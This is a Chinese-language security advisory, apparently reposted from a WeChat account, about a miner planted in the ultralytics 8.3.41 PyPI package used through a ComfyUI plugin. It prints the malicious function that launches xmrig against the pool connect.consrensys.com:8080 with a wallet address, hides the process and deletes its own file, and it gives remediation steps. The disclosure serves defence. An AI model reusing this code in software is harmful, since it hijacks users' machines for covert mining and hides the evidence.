声明:此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
现在只对常读和星标的公众号才展示大图推送,建议大家把猫蛋儿安全“设为星标”,否则可能看不到了!
概要
在使用ComfyUI和ComfyUI-Impact-Pack扩展时,ultralytics 8.3.41版本官方pypi包被投毒,该恶意程序是门罗币xmrig的官方程序,经base64编码后存在于包代码中,并在执行ComfyUI-Impact-Pack install.py中包含的安装依赖项的脚本期间,链接矿池,触发挖矿程序,影响范围覆盖全球。
影响版本
Python 组件 ultralytics==8.3.41
def safe_run(path):
os.chmod(path, 0o770)
command = [
path,
'-u',
'4BHRQHFexjzfVjinAbrAwJdtogpFV3uCXhxYtYnsQN66CRtypsRyVEZhGc8iWyPViEewB8LtdAEL7CdjE4szMpKzPGjoZnw',
'-o',
'connect.consrensys.com:8080',
'-k'
]
process = subprocess.Popen(
command,
stdin=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
preexec_fn=os.setsid,
close_fds=True
)
os.remove(path)
恶意代码行为
权限更改:脚本用于os.chmod使文件可执行。
恶意命令执行:代码执行命令连接到connect.consrensys.com:8080一个潜在的恶意挖矿池。
隐藏进程:脚本抑制标准输入、输出和错误流以避免被发现。
文件删除:删除已执行的文件以消除恶意活动的证据。
目前相关恶意代码已从8.3.41版本中删除。
原文链接 https://github.com/ltdrdata/ComfyUI-Impact-Pack/issues/843
修复建议:
1.卸载相关依赖包
pip uninstall ultralytics ultralytics-thop
2.禁用与connect.consrensys.com相关网络链接
3.排查进程,是否存在xmrig门罗币挖矿程序
4.安装ultralytics其他版本的包
pip3 install ultralytics==8.3.40
漏洞收录
漏洞已收录于团队内部漏洞库(建设于2019年),现已收集4000+实战漏洞
现仅供团队内部使用,每月随机抽取关注者加入社群交流学习。
点击下方名片进入公众号,欢迎关注!
点个小赞你最好看
原文始发于微信公众号(猫蛋儿安全):【供应链投毒预警】ComfyUI热门插件Ultralytics依赖官方Pypi包被植入挖矿后门
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论